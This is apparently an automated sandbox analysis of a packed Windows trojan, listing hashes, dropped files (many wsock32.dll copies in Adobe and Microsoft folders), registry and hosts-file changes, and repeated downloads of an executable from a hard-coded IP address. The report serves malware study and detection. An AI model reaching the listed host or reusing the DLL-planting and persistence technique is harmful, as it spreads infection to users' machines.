Analysis Date: 2015-05-12 23:52:31
MD5: cfc6b6b70ddacb83b0eded93fe17eb14
SHA1: 680d844b056daf0bdbcc40c1fe38c44ab462f997

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section UPX0 md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section UPX1 md5: e8dc66f0e5417bd0316732e707c65714 sha1: 38b857dd42f149fb25bef3181bf0c815487a7076 size: 15872
Section .rsrc md5: 65c4c55fd1115370abcade11d8dbbbd6 sha1: 52ab4bf9ae45af8abaa8933c3d18656db58538e6 size: 512
Timestamp: 2008-06-25 11:47:28
Packer: UPX -> www.upx.sourceforge.net
PEhash: 1307c071428b87b5d2265caa472123a1a8aebde0
IMPhash: 8bf1045c6407014343a435e1397e7c2e

Runtime Details:


Process
↳ C:\malware.exe

Creates File: c:\mfxixue.bat
Creates File: C:\WINDOWS\Tasks\alg.exe
Creates Process: c:\mfxixue.bat
Creates Mutex: \\xc3\\x96\\xc3\\x90\\xc2\\xbb\\xc2\\xaa\\xc3\\x8e\\xc3\\xbc\\xc3\\x91\\xc2\\xaa\\xc2\\xb9\\xc3\\xad2.3.5

Process
↳ c:\mfxixue.bat

Creates Process: ipconfig
Creates Process: C:\WINDOWS\Tasks\alg.exe

Process
↳ C:\WINDOWS\Tasks\alg.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{H8I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}\ ➝ safeint\\x00
Creates FileC:\Program Files\Common Files\Adobe\TypeSpt\Unicode\Mappings\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\Web Folders\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bin\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\AcroForm\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\Legal\Adobe Reader\7.0.0\wsock32.dll
Creates FileC:\WINDOWS\mfxixue.ini
Creates FileC:\Program Files\Common Files\Adobe\TypeSpt\Unicode\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\Browser\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\web server extensions\40\isapi\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\AcroForm\PMP\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\web server extensions\40\_vti_bin\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\VGX\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\ImageViewer\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\Messages\ENU\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Help\wsock32.dll
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\Legal\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\Javascripts\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\Legal\Adobe Reader\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\DW\1041\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bin\1033\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Resource\Linguistics\LanguageNames\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\VDKHome\ENU\wsock32.dll
Creates FileC:\WINDOWS\system32\drivers\etc\hosts
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins3d\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\PictureTasks\Howto\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\PictureTasks\Howto\images\wsock32.dll
Creates FileC:\WINDOWS\Tasks\\\xc2\\xcc\\xbb\\xaf.bat
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Program Files\Common Files\Microsoft Shared\DW\1028\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\Speech\1033\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\DW\wsock32.dll
Creates FileC:\Program Files\Common Files\Adobe\TypeSpt\Unicode\Mappings\Adobe\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\web server extensions\40\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\web server extensions\40\admisapi\wsock32.dll
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FileC:\Program Files\Common Files\Microsoft Shared\DW\1031\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Setup Files\wsock32.dll
Creates FilePIPE\lsarpc
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\Annotations\Stamps\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\SPPlugins\wsock32.dll
Creates File\Device\Afd\Endpoint
Creates FileC:\Program Files\Common Files\Microsoft Shared\DW\2052\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\HowTo\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\web server extensions\40\admisapi\scripts\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\DAO\wsock32.dll
Creates FileC:\Program Files\Common Files\Adobe\TypeSpt\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\PictureTasks\OLS\Locale\ENU\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\Messages\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\web server extensions\40\isapi\_vti_aut\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\Optional\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\web server extensions\40\servsupp\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\PictureTasks\Templates\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\web server extensions\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Setup Files\RdrBig709\ENU\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\VC\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\Speech\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\Multimedia\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\DW\1042\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\DW\1025\wsock32.dll
Creates FileC:\Program Files\Common Files\MSSoap\Binaries\Resources\1033\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\Multimedia\MPP\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Setup Files\RdrBig709\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Help\ENU\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\HowTo\ENU\Images\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Resource\Linguistics\Providers\Proximity\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\WebSearch\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\web server extensions\40\_vti_bin\_vti_adm\wsock32.dll
Creates FilePIPE\wkssvc
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\HowTo\ENU\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\web server extensions\40\admcgi\scripts\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\DW\1036\wsock32.dll
Creates FileC:\WINDOWS\Tasks\killbase.vbs
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\PictureTasks\OLS\Locale\wsock32.dll
Creates FileC:\Program Files\Common Files\MSSoap\Binaries\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\Annotations\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\web server extensions\40\isapi\_vti_adm\wsock32.dll
Creates FileC:\WINDOWS\Tasks\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\VDKHome\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\wsock32.dll
Creates FileC:\Program Files\Common Files\Adobe\TypeSpt\Unicode\Mappings\Mac\wsock32.dll
Creates FileC:\Program Files\Adobe\wsock32.dll
Creates File\Device\Afd\AsyncConnectHlp
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Resource\Font\wsock32.dll
Creates FileC:\Program Files\Common Files\Adobe\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Resource\CMap\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Resource\Linguistics\Providers\wsock32.dll
Creates FileC:\Program Files\Common Files\MSSoap\Binaries\Resources\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Esl\wsock32.dll
Creates FileC:\Program Files\Common Files\Adobe\TypeSpt\Unicode\Mappings\win\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\PictureTasks\OLS\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\MSInfo\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\Triedit\wsock32.dll
Creates FilePIPE\DAV RPC SERVICE
Creates FileC:\Program Files\Common Files\Microsoft Shared\DW\1033\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\Legal\Adobe Reader\7.0.0\en_US\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\ImageViewer\en_US\wsock32.dll
Creates FileC:\Program Files\Common Files\Adobe\TypeSpt\Unicode\ICU\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\web server extensions\40\_vti_bin\_vti_aut\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\Stationery\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Resource\Linguistics\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\Updater\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\DW\3082\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\TextConv\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\PictureTasks\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\web server extensions\40\admcgi\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Resource\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Resource\Font\PFM\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\DW\1040\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\Annotations\Stamps\ENU\wsock32.dll
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\yF8lGTTDr0.pif
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: \\xc3\\x96\\xc3\\x90\\xc2\\xbb\\xc2\\xaa\\xc3\\x8e\\xc3\\xbc\\xc3\\x91\\xc2\\xaa\\xc2\\xb9\\xc3\\xad2.3.5
Creates Mutex: HDM
Winsock DNS: 218.61.15.91
Winsock URL: ?mac=BvKX2e5WLQ&ver=2.3

Process
↳ ipconfig

Winsock DNS: 192.168.254.254

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\yF8lGTTDr0.pif

Network Details:

HTTP GET: http://218.61.15.91/1.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://218.61.15.91/1.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://218.61.15.91/1.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://218.61.15.91/1.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://218.61.15.91/1.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://218.61.15.91/1.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://218.61.15.91/1.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://218.61.15.91/1.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://218.61.15.91/1.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://218.61.15.91/1.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP: 192.168.1.1:1035 ➝ 218.61.15.91:80
Flows TCP: 192.168.1.1:1035 ➝ 218.61.15.91:80
Flows TCP: 192.168.1.1:1036 ➝ 218.61.15.91:80
Flows TCP: 192.168.1.1:1037 ➝ 218.61.15.91:80
Flows TCP: 192.168.1.1:1038 ➝ 218.61.15.91:80
Flows TCP: 192.168.1.1:1039 ➝ 218.61.15.91:80
Flows TCP: 192.168.1.1:1040 ➝ 218.61.15.91:80
Flows TCP: 192.168.1.1:1041 ➝ 218.61.15.91:80
Flows TCP: 192.168.1.1:1042 ➝ 218.61.15.91:80
Flows TCP: 192.168.1.1:1043 ➝ 218.61.15.91:80
Flows TCP: 192.168.1.1:1044 ➝ 218.61.15.91:80


Strings
h.h.
0"0'0,010<0I0S0h0t0E
0AUTORU(
%%0/c:\mf
0cu^y2
1&1,11$
1KdE!f
1/wm/updat
2F954E}\GHOSTBAK.exe
;2;@;M;b;
32.dll
|3.5{Y
4+96y>
4Eb<8B2
!50l9a
58:8A8F8K8Q8X8]8c8h8o8t8z8
?+?5?;?A?G?M?
>5F5X5_5k5p5x5}5
6$6)60656;6@6G6L6R6W6^6c6
!7&7-72787=7D7I7O7T7[7`7f7k7r7w7
7:@:G:V:`:e:k:}:
7hSa-DG
8-00AA
8#8*8/8
8_fdiM>}RLD&
8g98:o
|98l/"&
9-9A9H9n9
A218.61
'&a6XOSi
\Active Set,\Insta(ed 
ADVAPI32.dll
?Ah Us
aVirusv
<&<A<Z<l<s<
BHJLK}k
bufK(U
BYcov|5M
	bynumb
=c9&<t0
[,/CBDOcFS7AH6
ComponentA{H8IURB03-Ao
C/SfFnd
cycle.{645FF040-5081-101B-9
.datad
 DCZl%
deDCack
del "%s"	
df\NUSC!Xag$
dOwxn3
e#dd|my0
$Ed,w&
ef1ld_$6r
e{u?&f
ExitProcess
FWeYnSo
FWXp[\!\
GetProcAddress
h$+`C2r
h`F4Fp9
Hk:6Jnd
#hlDyj[	f
^hRp\Ra7%
http://
i6n6u6z6
-idx 0
InternetOpenA
IsWindow
>;>]>k>
KERNEL
KERNEL32.DLL
l6??2@YAPA
l9cra'@VL
la4WPp\;iYCas4
lD0mg#E
lEv<	}
LG<dL2r
ljg\P]
LoadLibraryA
LThis p
M:0x%x,
mnGaccept
M]S<PDF
MSVCRTA
MSVCRT.dll
n8shut
N  /dHb
Networkwb
&nvAdd
nvX/o+
o7ipc$fig
OBJECT 
Obj:("Ws
On ErPr Rp
opH\Ded	
OSsORtlI
ot be 
)P0v2d'D
'\ ps!/+0{%d.
pvXH4Q4
qV4V@1
RegCloseKey
RichCK
\SafeBoot
sBv3% 0
SectHbJJ6
SOFTWARE\Microfto
sS'k/]
S?Y?_?e?k?q?w?}?
Syts3S;
\Tasks\wsock
!This program cannot be run in DOS mode.
#=.=T=_=u=
t/v2vkV
UfD.EXE
URRENT_USER
USER32.dll
uvjOPz
ViewOf
VirtualProtect
VV$hxI(
vvz<O&
Vw;hc!
vwxyzABCDEFGHIJKLMNOPQRSTUVWX
WINDOWSEDM
WININET.dll
WS2_32.dll
$WSHEQP
wsprztf)
XPTPSW
`Y+ize*
-ZB7h7e1d2
Z;ppq~
z.WSyic